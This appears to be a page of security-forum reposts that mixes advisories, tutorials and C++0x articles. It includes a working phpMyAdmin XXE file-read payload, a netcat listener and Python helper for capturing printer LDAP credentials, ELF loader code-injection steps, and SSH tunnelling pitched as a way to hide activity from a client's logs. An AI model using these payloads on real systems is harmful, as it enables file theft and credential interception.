Chef: An Open Source Tool for Scalable Cloud and Data Center Automation (Cloud, Data Center, DevOps, Ruby)
Getting Started with Caucho Resin (Java, Standards, Web Services/Servers)
Getting Started with Adobe Flash Catalyst (Design/UX, Flex/ActionScript)
Getting Started with Adobe ColdFusion Builder (ColdFusion, IDE)
Leveraging ColdFusion 9 Exposed Services from Java (ColdFusion, Java, Web Services/Servers)
Adobe ColdFusion Web Services for PHP Programmers (ColdFusion, PHP, Web Services/Servers)
ColdFusion Builder 2: Faster Coding, Less Errors (ColdFusion, IDE)

Link: http://refcardz.dzone.com/
  16. Sponsors? Free drinks?
  17. phpMyAdmin Arbitrary File Read phpMyAdmin suffers from a remote arbitrary file read vulnerability caused by its use of the simplexml_load_string function to parse XML from user input. 80sec reported this bug on wooyun: phpMyAdmin uses simplexml_load_string to read XML from user input in libraries/import/xml.php, and this can be exploited to read files from the server or the network. The code looks like this: /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * alter the code in any way. It's basically a freebee. */ $xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT); unset($buffer); /** * The XML was malformed */ if ($xml === FALSE) { So you just need to craft an XML document like this: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE wooyun [ <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini"> ]> <pma_xml_export version="1.0" xmlns:pma=" http://www.phpmyadmin.net/some_doc_url/"> <!-- - Structure schemas --> <pma:structure_schemas> <pma:database name="test" collation="utf8_general_ci" charset="utf8"> <pma:table name="ts_ad"> &hi80sec; </pma:table> </pma:database> </pma:structure_schemas> <!-- -
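The payload above hinges on DTD entity expansion: the parser substitutes the entity reference in the document body with the entity's content. A minimal Python sketch of the mechanism (illustrative only, not phpMyAdmin's code; it uses an internal entity standing in for the external SYSTEM entity, which would instead pull in a file such as c:/windows/win.ini):

```python
# Illustrative sketch (not phpMyAdmin code): parsers that honor DTD entity
# definitions substitute entity references into the document body. The internal
# entity below stands in for the exploit's external SYSTEM entity, which would
# inject the contents of a local file instead of a fixed string.
import xml.etree.ElementTree as ET

payload = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE pma_xml_export [ <!ENTITY hi80sec "contents-of-win.ini"> ]>'
    '<pma_xml_export><table>&hi80sec;</table></pma_xml_export>'
)

root = ET.fromstring(payload)
print(root.find("table").text)  # the entity is expanded into the element text
```

With an external entity and a parser willing to resolve it, whatever the entity points at ends up in the parsed document the same way, which is what makes the phpMyAdmin import path leak file contents.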
  18. How to recompile software with hardware optimizations Ovidiu / 02/11/2011 I don’t like to recompile software. I also laugh my ass off when some Gentoo “god” tells me how much faster their system became after they tweaked their compile flags. But (because there’s always a “but”) once in a while I do compile software. And in some of those cases, I really want the best optimization possible. One of these cases was when I wanted to run a CPU miner for Litecoin on my i7. I wanted to squeeze the most out of the CPU, so I turned to the Gentoo wiki, where I found this page (seemed down when I wrote this). You can find out the hardware flags for GCC by running this simple command: $ echo "" | gcc -march=native -v -E - 2>&1 | grep cc1 The result looks something like this: /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/cc1 -E -quiet -v - -D_FORTIFY_SOURCE=2 -march=core2 -mcx16 -msahf -mpopcnt -msse4.2 --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=6144 -mtune=core2 -fstack-protector The interesting part is the span from -march=core2 through -mtune=core2, and it should be used as part of the CFLAGS. Adding a -O3 there can’t hurt, either: $ CFLAGS="-O3 -Wall <flags-from-above>" ./configure A ‘make’ will then build whatever program you’re compiling with the best optimizations for your hardware. I hope it’s useful! Enjoy! Author: Ovidiu Source: http://blog.mybox.ro/2011/11/02/how-to-recompile-software-with-hardware-optimizations/
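If you do this often, the flag extraction can be scripted. A small Python sketch (my own helper, not from the article) that pulls the -m*/--param tuning flags out of the sample cc1 line quoted above and assembles a CFLAGS string:

```python
# Sketch: extract the -m* and --param tuning flags from the cc1 line that
# `echo "" | gcc -march=native -v -E - 2>&1 | grep cc1` prints. The string
# below is the sample output quoted in the article.
import re

cc1_line = (
    "/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/cc1 -E -quiet -v - "
    "-D_FORTIFY_SOURCE=2 -march=core2 -mcx16 -msahf -mpopcnt -msse4.2 "
    "--param l1-cache-size=32 --param l1-cache-line-size=64 "
    "--param l2-cache-size=6144 -mtune=core2 -fstack-protector"
)

# "--param <value>" is two tokens, so match it as a unit before plain -m flags
flags = re.findall(r"--param \S+|-m\S+", cc1_line)
cflags = "-O3 -Wall " + " ".join(flags)
print(cflags)
```

Feed the real cc1 line in via stdin or subprocess and the printed string is ready to paste into `CFLAGS=...` for configure.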
  19. ld-linux.so ELF hooker Stephane and I are releasing a new tool that injects code at runtime, just between the ELF loader and the target binary. It is an alternative to LD_PRELOAD, just a little bit more intrusive but 100% reliable. Sources were released on Github: https://github.com/sduverger/ld-shatner When a binary is execve()'d, the kernel extracts from the ELF headers the interpreter to be launched, usually /lib/ld-linux.so.2. The kernel creates a new process and prepares the environment (arguments and auxiliary data). The target ELF entry point is set in the auxiliary vector of type "ENTRY". Then the kernel opens the requested interpreter, maps the memory regions and starts its execution at ld's ELF entry point. The loader then analyzes the target ELF file, performs its loading work and sets EIP to the target ELF entry point (extracted from auxv). At this point, the program's main() is eventually executed. Our goal was to permit the execution of code for arbitrary dynamically linked binaries without patching each of them. So our interest moved to the loader, the common point between most executables. Thus, we decided to patch a normal ld in order to inject code. My awesome colleague Stephane Duverger (the ramooflax author!) and I wrote ld-shatner. Its task is to patch the ld-linux.so file accordingly: After the ELF header, we shift the "ELF program header" a few pages away. In this new section, we inject a "loader routine" (hooked.s) and the embedded code to be executed at runtime. After having been saved in our section, ld's ELF entry point is overwritten to jump directly to our routine. This routine extracts the target ELF entry point from the auxiliary vectors and overwrites it with a pointer to our embedded code (func() in the payload). 
The original ld entry point is then called and ld works as usual. Eventually, it calls the entry point set in the auxiliary vector (which was replaced by a pointer to our payload). The embedded code runs. It returns to our routine, which finally jumps to the original target entry point. Some pictures before/after the ld-shatner voodoo: Screenshot: http://i39.tinypic.com/vf8gli.png $ make clean all $ cp /lib/ld-linux.so.2 /bin/ls . $ ./ld-shatner ld-linux.so.2 obj.elf $ sudo cp ld-hook.so /lib/ $ ./interpatch ls $ ./ls ld-hook <---------------------- output of obj.elf [...] OK, we cheat for the moment because we have to patch the ls binary, but eventually we will not have to do that. So what? My ultimate goal for ld-shatner is to use this method for starting applications in my sandbox project, seccomp-nurse. For the moment, I rely on the LD_PRELOAD feature, but this approach is... hackish, and I have to work around some bugs because of this special context... Download: https://github.com/sduverger/ld-shatner Source: http://justanothergeek.chdir.org/2011/11/ld-linuxso-elf-hooker.html
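The entry-point bookkeeping described in this post is plain ELF header parsing. A small Python sketch (my own illustration, not part of ld-shatner; assumes a 64-bit little-endian ELF, and `elf_entry` is a made-up helper name) that reads the e_entry field the loader ultimately jumps to:

```python
# Sketch: read e_entry from a 64-bit little-endian ELF header -- the entry
# point the kernel passes to ld via the auxiliary vector, and the field
# ld-shatner redirects to its injected payload.
import struct

def elf_entry(path):
    with open(path, "rb") as f:
        header = f.read(64)              # the ELF64 header is 64 bytes
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_entry: 8-byte little-endian field at offset 24 of the ELF64 header
    # (after the 16-byte e_ident, then e_type, e_machine, e_version)
    return struct.unpack_from("<Q", header, 24)[0]
```

On a Linux box, `hex(elf_entry("/bin/ls"))` should match the "Entry point address" that `readelf -h /bin/ls` reports.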
  20. Windows Kernel Zero Day Vulnerability Found in Duqu Installer Posted by THN Reporter On 11/01/2011 08:17:00 AM Duqu malware attack exploited a zero-day vulnerability in the Windows kernel, according to security researchers tracking the Stuxnet-like cyber-surveillance Trojan. The vulnerability has since been reported to Microsoft and Microsoft is working on a fix for the kernel vulnerability right now. Researchers at the Laboratory of Cryptography and System Security (CrySyS) in Hungary confirmed the existence of the zero-day vulnerability and exploit in a brief note posted to its web site. Our lab, the Laboratory of Cryptography and System Security (CrySyS) pursued the analysis of the Duqu malware and as a result of our investigation, we identified a dropper file with an MS 0-day kernel exploit inside. We immediately provided competent organizations with the necessary information such that they can take appropriate steps for the protection of the users. The installer file is a Microsoft Word document (.doc) that exploits a previously unknown kernel vulnerability that allows code execution. We contacted Microsoft regarding the vulnerability and they're working diligently towards issuing a patch and advisory. When the file is opened, malicious code executes and installs the main Duqu binaries. The chart below explains how the exploit in the Word document file eventually leads to the installation of Duqu. Other security vendors have reported infections in the following countries: • Austria • Hungary • Indonesia • United Kingdom • Iran - infections different from those observed by Symantec. "Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. 
We are working diligently to address this issue and will release a security update for customers through our security bulletin process", Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group said in a statement. You can find Symantec updated whitepaper (version 1.3) here. Key updates in the Symantec whitepaper include: • An unpatched zero-day vulnerability is exploited through a Microsoft Word document and installs Duqu • Attackers can spread Duqu to computers in secure zones and control them through a peer-to-peer C&C protocol • Six possible organizations in eight countries have confirmed infections • A new C&C server (77.241.93.160) hosted in Belgium was discovered and has been shut down. Symantec whitepaper: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf Sursa: http://thehackernews.com/2011/11/windows-kernel-zero-day-vulnerability.html
  21. SSH Tunneling on Windows Easy-breezy, but sometimes necessary to bypass the prying eyes of customers. When you’re on an internal test you don’t want them to see you googling how to hack their network in their logs! Set up PuTTY for the SSH tunnel (reason: sets up a loopback port (7070) on your local PC and connects over port 22 to the remote shell): Session: user@yourserver.com:22 Connection>SSH: V2, Enable Compression Connection>SSH>Tunnels>Source: 7070, Dynamic, ADD Session: Save, Open Or, on *nix or cygwin, create an SSH tunnel via the command line: ssh -D 7070 -p 22 user@yourserver.com sleep 9999 Set up Firefox to use the tunnel: Tools > Options > Network > Settings > Manual Socks: 127.0.0.1:7070, click OK (reason: configures Firefox to route traffic through the tunnel you just made) Set up Firefox to use remote DNS (reason: by default your local PC does the DNS lookups, which reveals what websites you are visiting, so this step sends DNS over the SSH tunnel): about:config network.proxy.socks_remote_dns=true Restart the browser. Test: verify everything is over port 22, verify your IP is different on whatismyip.com, and filter on "dns" in Wireshark - there should be no entries. via digitalcrunch.com Source: http://www.securityaegis.com/ssh-tunneling-on-windows/
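On *nix, the same dynamic tunnel can be made permanent with an OpenSSH client config entry, so a single short command replaces the flags (the `tunnelbox` alias and the host/user names below are placeholders):

```
# ~/.ssh/config -- "tunnelbox" is a made-up alias; substitute your own server
Host tunnelbox
    HostName yourserver.com
    User user
    Port 22
    DynamicForward 7070
    Compression yes
```

After that, `ssh tunnelbox` opens the same SOCKS listener on 127.0.0.1:7070 that the PuTTY setup above provides.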
  22. Java concurrency Building and testing concurrent applications for the Java platform Date: 07 Oct 2011 (Published 23 Aug 2011) 1. Learn Java concurrency basics Threads and processes are the basic units of execution in concurrent Java programming. Every process has at least one thread, and all of the threads in a process share its resources. Understand the benefits of threads and why it's essential to use them safely. READ: Introduction to Java threads 2. Master high-level Java concurrency utilities Learn how to use the thread-safe, well-tested, high-performance concurrent building blocks in the java.util.concurrent package, introduced in Java SE 5. And find out how to avoid both common and lesser-known concurrency pitfalls. PRACTICE: Concurrency in JDK 5.0 READ: 5 things you didn't know about ... java.util.concurrent, Part 1 READ: 5 things you didn't know about ... java.util.concurrent, Part 2 READ: Java concurrency bug patterns for multicore systems 3. Test and analyze your concurrent code Take advantage of tools developed by IBM researchers for testing, debugging, and analyzing concurrent Java applications. DOWNLOAD: Java Thread Activity Analyzer (free download) DOWNLOAD: IBM Lock Analyzer for Java (free download) DOWNLOAD: IBM Thread and Monitor Dump Analyzer for Java (free download) DOWNLOAD: Multicore Software Development Kit (free download) DOWNLOAD: ConcurrentTesting - Advanced Testing for Multi-Threaded Applications (free limited trial version) PRACTICE: Multithreaded unit testing with ConTest 4. Explore alternate concurrency models In response to advances in multicore processor hardware, approaches to writing concurrent applications for the Java platform are diversifying. Concurrency support in two alternate languages for the JVM — Scala and Clojure — eschews the thread model. Learn about the actor and agent concurrency models in those languages, and about third-party Java and Groovy libraries that implement those models. 
And learn more about fork-join, a multicore-friendly concurrency enhancement in Java SE 7. LISTEN: Alex Miller talks concurrency READ: Explore Scala concurrency READ: Clojure and concurrency READ: Introducing Kilim: An actor framework for Java concurrency READ: Resolve common concurrency problems with GPars READ: Java theory and practice: Stick a fork in it Sursa: www.ibm.com/developerworks/training/kp/j-kp-concurrency/index.html
  23. Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton During my presentation at Defcon 19, we discussed a new attack method against printers. This attack method involves tricking the printer into passing LDAP or SMB credentials back to the attacker in plain text. We refer to this attack as a Pass-Back Attack. So it's been a while, but we wanted to release a short tutorial discussing how this attack is performed. Over the past year, one focus of the Foofus.NET team has been developing and testing attacks against a number of Multifunction Printer (MFP) devices. A primary goal of this research is to demonstrate the effect of trust relationships between devices that are generally considered benign, and critical systems such as Microsoft Windows Domains. One of the most interesting attacks developed during this project is what we refer to as a Pass-Back Attack: an attack where we direct an MFP device into authenticating (LDAP or SMB authentication) against a rogue system rather than the expected server. In the following sections we will step through the entire process of a Pass-Back Attack using a Ricoh Aficio MP 5001 as our target device. This attack has been found to work on a number of Ricoh or rebranded Ricoh systems. Additionally, this attack works against a large number of MFP devices manufactured by Sharp. We expect there are many other devices that this attack will work against. This attack will be performed using a web browser, Netcat and a web proxy. First, we need to create a rogue listener that will be used to capture the authentication process initiated from the MFP. This is a relatively easy problem to solve; we can simply set up a listener using Netcat. $ nc -l 1389 In this attack we will use port 1389. 
If you’re reading this, you’re probably well aware that binding to a privileged port requires some form of administrative account such as “root.” We prefer non-privileged ports for this attack because they allow us to demonstrate how unprivileged access on one system can be used to gain privileged access to another system. A demonstration of this involves a scenario where you have remote (user-level) access to a device on a filtered subnet and are looking to gain more privileged access to a wider set of systems. Additionally, this approach highlights the fact that LDAP can be configured to authenticate against any software listening on any port. Download: http://www.foofus.net/~percX/praeda/pass-back-attack.pdf Sursa: http://www.foofus.net/?p=468
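The netcat listener above can equally be a few lines of Python when you want to post-process what the device sends. A sketch (stdlib only; `capture_once` is a hypothetical helper, equivalent in spirit to `nc -l 1389`):

```python
# Sketch: a rogue listener equivalent to `nc -l 1389`. It accepts a single
# connection on a non-privileged port and returns whatever the device sends --
# e.g. an LDAP simple bind carrying plaintext credentials.
import socket

def capture_once(port=1389, max_bytes=4096):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, addr = srv.accept()        # blocks until the MFP connects
        with conn:
            data = conn.recv(max_bytes)
    return addr, data
```

Point the MFP's LDAP server setting at your host and this port, trigger an address-book lookup, and the returned bytes contain the credentials the printer was configured with.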
  24. Static code analysis and the new language standard C++0x April 14, 2010 9:00 PM PDT Abstract Introduction 1. auto 2. decltype 3. R-value reference 4. Right angle brackets 5. Lambdas 6. Suffix return type syntax 7. static_assert 8. nullptr 9. New standard classes 10. New trends in development of static code analyzers Summary References Abstract The article discusses the new capabilities of the C++ language described in the C++0x standard and supported in Visual Studio 2010. Using PVS-Studio as an example, we will see how the changes in the language influence static code analysis tools. Introduction The new C++ language standard is about to come into our lives. It is still called C++0x, although its final name seems to be C++11. The new standard is partially supported by modern C++ compilers, for example, Intel C++ and Visual C++. This support is far from full-fledged, and it is quite clear why. First, the standard has not been accepted yet, and second, it will take some time to introduce its specifics into compilers even once it is accepted. Compiler developers are not the only ones for whom support of the new standard is important. The language innovations must quickly be supported in static source code analyzers as well. The new standard promises backward compatibility: existing C++ code is almost guaranteed to compile correctly with new compilers without any modifications. But that does not mean that a program containing no new language constructs can still be processed by a static analyzer that does not support the new C++0x standard. We became convinced of this in practice when trying to check a project created in the beta version of Visual Studio 2010 with PVS-Studio: the point is the header files, which already use the new language constructs. 
For example, you may see that the header file "stddef.h" uses the new operator decltype: namespace std { typedef decltype(__nullptr) nullptr_t; } Such constructs are naturally considered syntactically wrong by an analyzer that does not support C++0x, and either cause the program to abort or produce incorrect results. It became obvious that we had to provide support for C++0x in PVS-Studio by the moment Visual Studio was released, at least to the extent it is done in this compiler. We may say that we have fulfilled this task successfully, and at the moment of writing this article, the new version PVS-Studio 3.50, integrating both into Visual Studio 2005/2008 and Visual Studio 2010, has become available on our site. Beginning with version PVS-Studio 3.50, the tool provides support for the same part of the C++0x standard as Visual Studio 2010. This support is not perfect - for example, in the case of "right angle brackets" - but we will continue working on support for the C++0x standard in the next versions. In this article, we will study the new features of the language which are supported in the first edition of Visual Studio 2010. We will look at these features from different viewpoints: what this or that new ability is about, whether there is a relation to 64-bit errors, how the new language construct is supported in PVS-Studio, and how its appearance impacts the VivaCore library. Note. VivaCore is a library for code parsing, analysis and transformation. VivaCore is an open-source library that supports the C and C++ languages. The product PVS-Studio is based on VivaCore, and other software projects may be created relying on this library as well. The article we want to present may be called a report on the investigation and support of the new standard in PVS-Studio. The tool PVS-Studio diagnoses 64-bit and parallel OpenMP errors. 
But since the topic of moving to 64-bit systems is more relevant at the moment, we will mostly consider examples that show how to detect 64-bit errors with PVS-Studio. 1. auto As in C, the type of a variable in C++ must be defined explicitly. But with the appearance of template types and template metaprogramming techniques in the C++ language, it became common for the type of an object to be not so easy to define. Even in a rather simple case - when searching for array items - we need to define the type of an iterator in the following way: for (vector<int>::iterator itr = myvec.begin(); itr != myvec.end(); ++itr) Such constructs are very long and cumbersome. To make the record briefer, we may use typedef, but that spawns new entities and does little for convenience. C++0x offers its own technique to make this issue a bit less complicated. The meaning of the keyword auto is replaced with a different one in the new standard. Previously, auto meant that a variable is created on the stack, and it was implied if you had not specified otherwise (for example, register); now it is analogous to var in C# 3.0. The type of a variable defined as auto is determined by the compiler itself based on the object that initializes the variable. We should note that an auto variable cannot store values of different types during one execution of the program. C++ still remains a statically typed language, and by using auto we just tell the compiler to determine the type on its own: once the variable is initialized, its type cannot be changed. Now the iterator can be defined in this way: for (auto itr = myvec.begin(); itr != myvec.end(); ++itr) Besides mere convenience of writing the code and its simplification, the keyword auto makes the code safer. 
Let us consider an example where auto will be used to make the code safe from the viewpoint of 64-bit software development: bool Find_Incorrect(const string *arrStr, size_t n) { for (size_t i = 0; i != n; ++i) { unsigned n = arrStr[i].find("ABC"); if (n != string::npos) return true; } return false; }; This code has a 64-bit error: the function behaves correctly when compiling the Win32 version and fails when the code is built in the Win64 mode. The error is in using the type unsigned for the variable "n", although the type string::size_type must be used which is returned by the function find(). In the 32-bit program, the types string::size_type and unsigned coincide and we get correct results. In the 64-bit program, string::size_type and unsigned do not coincide any more. When the substring is not found, the function find() returns the value string::npos that equals 0xFFFFFFFFFFFFFFFFui64. This value is cut to the value 0xFFFFFFFFu and placed into a 32-bit variable. As a result, the condition 0xFFFFFFFFu != 0xFFFFFFFFFFFFFFFFui64 is true and we have the situation when the function Find_Incorrect always returns true. In this example, the error is not so dangerous because it is detected even by the compiler not to speak of a specialized analyzer Viva64 (included into PVS-Studio). This is how the compiler detects the error: warning C4267: 'initializing' : conversion from 'size_t' to 'unsigned int', possible loss of data This is how Viva64 does it: V103: Implicit type conversion from memsize to 32-bit type. What is most important, this error is quite possible and often occurs in code due to inaccurate choice of a type to store the returned value. The error might appear even because the programmer is reluctant to use a cumbersome construct of the string::size_type kind. Now we can easily avoid such errors without overloading the code. 
Using the type auto, we may write the following simple and safe code: auto n = arrStr[i].find("ABC"); if (n != string::npos) return true; The error disappeared by itself. The code has not become more complicated or less effective. Here is the conclusion - it is reasonable in many cases to use auto. The key word auto will reduce the number of 64-bit errors or let you eliminate them with more grace. But auto does not in itself guarantee that all the 64-bit errors will be eliminated! It is just one more language tool that serves to make programmers' life easier but not to take all their work of managing the types. Consider this example: void *AllocArray3D(int x, int y, int z, size_t objectSize) { int size = x * y * z * objectSize; return malloc(size); } The function must calculate the array's size and allocate the necessary memory amount. It is logical to expect that this function will be able to allocate the necessary memory amount for the array of the size 2000*2000*2000 of double type in the 64-bit environment. But the call of the "AllocArray3D(2000, 2000, 2000, sizeof(double));" kind will always return NULL, as if it is impossible to allocate such an amount of memory. The true reason for this is the overflow in the expression "int size = x * y * z * sizeof(double)". The variable size takes the value -424509440 and the further call of the function malloc is senseless. By the way, the compiler will also warn that this expression is unsafe: warning C4267: 'initializing' : conversion from 'size_t' to 'int', possible loss of data Relying on auto, an inaccurate programmer may modify the code in the following way: void *AllocArray3D(int x, int y, int z, size_t objectSize) { auto size = x * y * z * objectSize; return (double *)malloc(size); } But it will not eliminate the error at all and will only hide it. The compiler will not generate a warning any more but the function AllocArray3D will still return NULL. 
The type of the variable size will automatically turn into size_t. But the overflow occurs when calculating the expression "x * y * z". This subexpression has the type int at first and only then it will be extended to size_t when being multiplied by the variable "objectSize". Now this hidden error may be found only with the help of Viva64 analyzer: V104: Implicit type conversion to memsize type in an arithmetic expression. The conclusion - you must be attentive even if you use auto. Let us now briefly look how the new key word is supported in the library VivaCore the static analyzer Viva64 is based on. So, the analyzer must be able to understand that the variable AA has the type int to warn (see V101) the programmer about an extension of the variable AA to the type size_t: void Foo(int X, int Y) { auto AA = X * Y; size_t BB = AA; //V101 } First of all, a new table of lexemes was composed that included the new C++0x key words. This table is stored in the file Lex.cc and has the name tableC0xx. To avoid modifying the obsolete code responsible for processing the lexeme "auto" (tkAUTO), it got the name tkAUTOcpp0x in this table. With the appearance of the new lexeme, the following functions were modified: isTypeToken, optIntegralTypeOrClassSpec. A new class LeafAUTOc0xx appeared. TypeInfoId has a new object class - AutoDecltypeType. To code the type auto, the letter 'x' was chosen and it was reflected in the functions of the classes TypeInfo and Encoding. These are, for example, such functions as IsAutoCpp0x, MakePtree. These corrections let you parse the code with the key word auto that has a new meaning and save the type of objects in the coded form (letter 'x'). But this does not let you know what type is actually assigned to the variable. That is, VivaCore lacks the functionality that would let you make sure that the variable AA in the expression "auto AA = X * Y" will have the type int. 
This functionality is implemented in the source code of Viva64 and cannot be integrated into the code of VivaCore library. The implementation principle lies in additional work of calculating the type in TranslateAssignInitializer method. After the right side of the expression is calculated, the association between the (Bind) name of the variable and the type is replaced with another. FULL article: http://software.intel.com/en-us/articles/static-code-analysis-and-the-new-language-standard-c0x/
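As a quick sanity check of the AllocArray3D discussion above, the -424509440 value can be reproduced by wrapping the product into a signed 32-bit integer (plain arithmetic to illustrate the overflow, not PVS-Studio output):

```python
# Reproduce the 32-bit overflow from "int size = x * y * z * objectSize"
# for a 2000 x 2000 x 2000 array of double (objectSize == 8).
x = y = z = 2000
object_size = 8

full = x * y * z * object_size       # 64_000_000_000 -- needs ~36 bits
wrapped = full & 0xFFFFFFFF          # keep the low 32 bits, as a 32-bit int would
if wrapped >= 0x80000000:            # reinterpret as signed two's complement
    wrapped -= 0x100000000

print(wrapped)  # -424509440, the value quoted in the article
```

Negative size, so malloc fails; the auto "fix" in the article merely moves the same wraparound into the int subexpression x * y * z before the widening multiply.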
  25. No 'Concepts' in C++0x Overload Journal #92 - August 2009 Author: Bjarne Stroustrup There have been some major decisions made about the next C++ Standard. Bjarne Stroustrup explains what's changed and why. At the July 2009 Frankfurt meeting of the ISO C++ Standards Committee (WG21) [iSO], the 'concepts' mechanism for specifying requirements for template arguments was 'decoupled' (my less-diplomatic phrase was 'yanked out'). That is, 'concepts' will not be in C++0x or its standard library. That - in my opinion - is a major setback for C++, but not a disaster; and some alternatives were even worse. I have worked on 'concepts' for more than seven years and looked at the problems they aim to solve much longer than that. Many have worked on 'concepts' for almost as long. For example, see (listed in chronological order): Bjarne Stroustrup and Gabriel Dos Reis: 'Concepts - Design choices for template argument checking'. October 2003. An early discussion of design criteria for 'concepts' for C++. [stroustrup03a] Bjarne Stroustrup: 'Concept checking - A more abstract complement to type checking'. October 2003. A discussion of models of 'concept' checking. [stroustrup03b] Bjarne Stroustrup and Gabriel Dos Reis: 'A concept design' (Rev. 1). April 2005. An attempt to synthesize a 'concept' design based on (among other sources) N1510, N1522, and N1536. [stroustrup05] Jeremy Siek et al.: Concepts for C++0x. N1758==05-0018. May 2005. [siek05] Gabriel Dos Reis and Bjarne Stroustrup: 'Specifying C++ Concepts'. POPL06. January 2006. [Reis06] Douglas Gregor and Bjarne Stroustrup: Concepts. N2042==06-0012. June 2006. The basis for all further 'concepts' work for C++0x. [Gregor06a] Douglas Gregor et al.: Concepts: Linguistic Support for Generic Programming in C++. OOPSLA'06, October 2006. An academic paper on the C++0x design and its experimental compiler ConceptGCC. 
[Gregor06b] Pre-Frankfurt working paper (with 'concepts' in the language and standard library): 'Working Draft, Standard for Programming Language C++'. N2914=09-0104. June 2009. [Frankfurt09] B. Stroustrup: Simplifying the use of concepts. N2906=09-0096. June 2009. [stroustrup09] It need not be emphasized that I and others are quite disappointed. The fact that some alternatives are worse is cold comfort and I can offer no quick and easy remedies. Please note that the C++0x improvements to the C++ features that most programmers see and directly use are unaffected. C++0x will still be a more expressive language than C++98, with support for concurrent programming, a better standard library, and many improvements that make it significantly easier to write good (i.e., efficient and maintainable) code. In particular, every example I have ever given of C++0x code (e.g., in 'Evolving a language in and for the real world: C++ 1991-2006' [stroustrup07] at ACM HOPL-III [HOPL]) that does not use the keywords 'concept' or 'requires' is unaffected. See also my C++0x FAQ [FAQ]. Some people even rejoice that C++0x will now be a simpler language than they had expected. 'Concepts' were to have been the central new feature in C++0x for putting the use of templates on a better theoretical basis, for firming-up the specification of the standard library, and a central part of the drive to make generic programming more accessible for mainstream use. For now, people will have to use 'concepts' without direct language support as a design technique. My best scenario for the future is that we get something better than the current 'concept' design into C++ in about five years. Getting that will take some serious focused work by several people (but not 'design by committee'). What happened? 'Concepts', as developed over the last many years and accepted into the C++0x working paper in 2008, involved some technical compromises (which is natural and necessary). 
The experimental implementation was sufficient to test the 'conceptualized' standard library, but was not production quality. The latter worried some people, but I personally considered it sufficient as a proof of concept.

My concern was with the design of 'concepts' and in particular with the usability of 'concepts' in the hands of 'average programmers'. That concern was shared by several members. The stated aim of 'concepts' was to make generic programming more accessible to most programmers [stroustrup03a], but that aim seemed to me to have been seriously compromised: rather than making generic programming more accessible, 'concepts' were becoming yet another tool in the hands of experts (only).

Over the last half year or so, I had been examining C++0x from a user's point of view, and I worried that even use of libraries implemented using 'concepts' would put new burdens on programmers. I felt that the design of 'concepts' and its use in the standard library did not adequately reflect our experience with 'concepts' over the last few years.

Then, a few months ago, Alisdair Meredith (an insightful committee member from the UK) and Howard Hinnant (the head of the standard library working group) asked some good questions relating to who should directly use which parts of the 'concepts' facilities and how. That led to a discussion of usability involving many people with a variety of concerns and points of view; and I eventually - after much confused discussion - published my conclusions [stroustrup09]. To summarize and somewhat oversimplify, I stated that:

- 'Concepts' as currently defined are too hard to use and will lead to disuse of 'concepts', possibly disuse of templates, and possibly to lack of adoption of C++0x.
- A small set of simplifications [stroustrup09] can render 'concepts' good-enough-to-ship on the current schedule for C++0x or with only a minor slip.

That's pretty strong stuff.
Please remember that standards committee discussions are typically quite polite, and since we are aiming for consensus, we tend to avoid direct confrontation. Unfortunately, the resulting further (internal) discussion was massive (hundreds of more and less detailed messages) and confused. No agreement emerged on what problems (if any) needed to be addressed or how. This led me to order the alternatives for a presentation in Frankfurt:

- 'Fix and ship'
  Remaining work: remove explicit 'concepts', add explicit refinement, add 'concept'/type matching, handle 'concept' map scope problems
  Risks: no implementation, complexity of description
  Schedule: no change or one meeting
- 'Yank and ship'
  Remaining work: yank (core and standard library)
  Risks: old template problems remain, disappointment in 'progressive' community ('seven years' work down the drain')
  Schedule: five years to 'concepts' (complete redesign needed) or never
- 'Status quo'
  Remaining work: details
  Risks: unacceptable programming model, complexity of description (alternative view: none)
  Schedule: no change

I and others preferred the first alternative ('fix and ship') and considered it feasible. However, a large majority of the committee disagreed and chose the second alternative ('yank and ship', renaming it 'decoupling'). In my opinion, both are better than the third alternative ('status quo').

My interpretation of that vote is that given the disagreement among proponents of 'concepts', the whole idea seemed controversial to some, some were already worried about the ambitious schedule for C++0x (and, unfairly IMO, blamed 'concepts'), and some were never enthusiastic about 'concepts'. Given that, 'fixing concepts' ceased to be a realistic option. Essentially, all expressed support for 'concepts', just 'later' and 'eventually'. I warned that a long delay was inevitable if we removed 'concepts' now because, in the absence of schedule pressures, essentially all design decisions will be re-evaluated.
Surprisingly (maybe), there were no technical presentations and discussions about 'concepts' in Frankfurt. The discussion focused on timing, and my impression is that the vote was decided primarily on timing concerns.

Please don't condemn the committee for being cautious. This was not a 'Bjarne vs. the committee fight', but a discussion trying to balance a multitude of serious concerns. I and others are disappointed that we didn't take the opportunity of 'fix and ship', but C++ is not an experimental academic language. Unless members are convinced that the risks of doing harm to production code are very low, they must oppose. Collectively, the committee is responsible for billions of lines of code. For example, lack of adoption of C++0x or long-term continued use of unconstrained templates in the presence of 'concepts' would lead to a split of the C++ community into separate sub-communities. Thus, a poor 'concept' design could be worse than no 'concepts'. Given the choice between the two, I too voted for removal. I prefer a setback to a likely disaster.

Technical issues

The unresolved issues about 'concepts' focused on the distinction between explicit and implicit 'concept' maps (see [stroustrup09]):

- Should a type that meets the requirements of a 'concept' automatically be accepted where the 'concept' is required (e.g. should a type X that provides +, -, *, and / with suitable parameters automatically match a 'concept' C that requires the usual arithmetic operations with suitable parameters), or should an additional explicit statement (a 'concept' map from X to C) that a match is intentional be required? (My answer: use automatic match in almost all cases.)
- Should there be a choice between automatic and explicit 'concepts', and should a designer of a 'concept' be able to force every user to follow his choice? (My answer: all 'concepts' should be automatic.)
